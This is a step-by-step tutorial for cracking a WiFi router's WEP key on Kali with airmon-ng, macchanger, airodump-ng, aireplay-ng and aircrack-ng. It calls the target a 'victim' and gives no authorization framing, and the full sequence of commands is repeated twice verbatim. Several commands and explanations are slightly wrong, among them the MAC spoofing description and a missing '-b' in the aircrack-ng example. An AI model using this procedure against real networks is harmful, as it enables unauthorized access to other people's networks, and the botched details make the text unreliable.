For this tutorial you need external WiFi adapter or have Kali installed in your Hard Drive, not a virtual machine. Otherwise, look for the method using normal windows OS in the intermediate section
Start up Kali, Login and then follow the below steps
Step 1: Open console and type the following to start up network connections.
/etc/init.d/networking start
Step 2: Now we are going to put the network card into moniter mode by typing the following.
airmon-ng
(You will find your Interface here)
Step 3: So first start up the scan
airmon-ng start wlan0
or
airmon-ng start wlan1
(this command depends on what it reads on your router or networking card as, replace as needed)
Step 4: Lets spoof your MAC address first by typing this next command.
ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up
This will change the MAC address being used to the computer we are connecting to.
Step 5: Time to start finding our victim’s router, type the following in console.
airodump-ng mon0
This
will show the entire list of all the WiFi connections your adapter can
catch and once you find one that suits your interest, and continue:
Step 6: Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new console: (Read carefully!)
airodump-ng -c [channel number] -bssid [the BSSID of the router] -w [new name for the cap file] mon0 (the interface we are using)
For Example:
airodump-ng -c 1 -bssid 11:22:33:44:55:66 -w Newcapfile mon0
(*IMPORTANT-
You have to fill in everything between [ ] yourself, since it is
different for every case. You will get the BSSID, channel number from
the previois steps, ‘mon0’ or ‘mon1’ based on your adapter, and for name
of cap file you can type in any file name like ‘MyCapFile’)
Step 7:
Lets start the passphrapse cracking. We need to get around
30,000-50,000 IVs(packets). We start by sending fake authentication
requests. To do this open a new console and type:
aireplay-ng -1 1 -a [The BSSID of the router] mon0
For example:
aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0
Step 8: Almost done, we just need to contune the capturing process, open another console and type:
aireplay-ng -3 -b [The BSSID of the router] mon0
Now
it will start replaying ARPs. (ARP = Address Resolution protocol, it is
needed to find the device address from the IP address)
Collect a
good amount of IVs like around 30,000-50,000(the more the
better).(Depending on the network strength, this step can take anywhere
from 15 minutes to about 3 hours). It should be stored in the .cap file
Once you’ve captured enough packets, type CTRL + C to stop the process
and continue to step 9.
Step 9: Time to start
cracking that cap file You can think of it like every single packet
contains a bit of leaked password. So we’ve captured a large number of
packets, compiled them in the .cap file and now we’re going to try and
find out tiny bits of information from each packet and piece it together
to give us the PassPhrase. Open a new console and type:
aircrack-ng -b \[bssid\] \[file name\]-01.cap
For example:
aircrack-ng 11:22:33:44:55:66 wepcap-01.cap
Step 10: Wait a few seconds and we should now be presented with the key to log in to the router.
Start up Kali, Login and then follow the below steps
Step 1: Open console and type the following to start up network connections.
/etc/init.d/networking start
Step 2: Now we are going to put the network card into moniter mode by typing the following.
airmon-ng
(You will find your Interface here)
Step 3: So first start up the scan
airmon-ng start wlan0
or
airmon-ng start wlan1
(this command depends on what it reads on your router or networking card as, replace as needed)
Step 4: Lets spoof your MAC address first by typing this next command.
ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up
This will change the MAC address being used to the computer we are connecting to.
Step 5: Time to start finding our victim’s router, type the following in console.
airodump-ng mon0
This
will show the entire list of all the WiFi connections your adapter can
catch and once you find one that suits your interest, and continue:
Step 6: Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new console: (Read carefully!)
airodump-ng -c [channel number] -bssid [the BSSID of the router] -w [new name for the cap file] mon0 (the interface we are using)
For Example:
airodump-ng -c 1 -bssid 11:22:33:44:55:66 -w Newcapfile mon0
(*IMPORTANT-
You have to fill in everything between [ ] yourself, since it is
different for every case. You will get the BSSID, channel number from
the previois steps, ‘mon0’ or ‘mon1’ based on your adapter, and for name
of cap file you can type in any file name like ‘MyCapFile’)
Step 7:
Lets start the passphrapse cracking. We need to get around
30,000-50,000 IVs(packets). We start by sending fake authentication
requests. To do this open a new console and type:
aireplay-ng -1 1 -a [The BSSID of the router] mon0
For example:
aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0
Step 8: Almost done, we just need to contune the capturing process, open another console and type:
aireplay-ng -3 -b [The BSSID of the router] mon0
Now
it will start replaying ARPs. (ARP = Address Resolution protocol, it is
needed to find the device address from the IP address)
Collect a
good amount of IVs like around 30,000-50,000(the more the
better).(Depending on the network strength, this step can take anywhere
from 15 minutes to about 3 hours). It should be stored in the .cap file
Once you’ve captured enough packets, type CTRL + C to stop the process
and continue to step 9.
Step 9: Time to start
cracking that cap file You can think of it like every single packet
contains a bit of leaked password. So we’ve captured a large number of
packets, compiled them in the .cap file and now we’re going to try and
find out tiny bits of information from each packet and piece it together
to give us the PassPhrase. Open a new console and type:
aircrack-ng -b \[bssid\] \[file name\]-01.cap
For example:
aircrack-ng 11:22:33:44:55:66 wepcap-01.cap
Step 10: Wait a few seconds and we should now be presented with the key to log in to the router.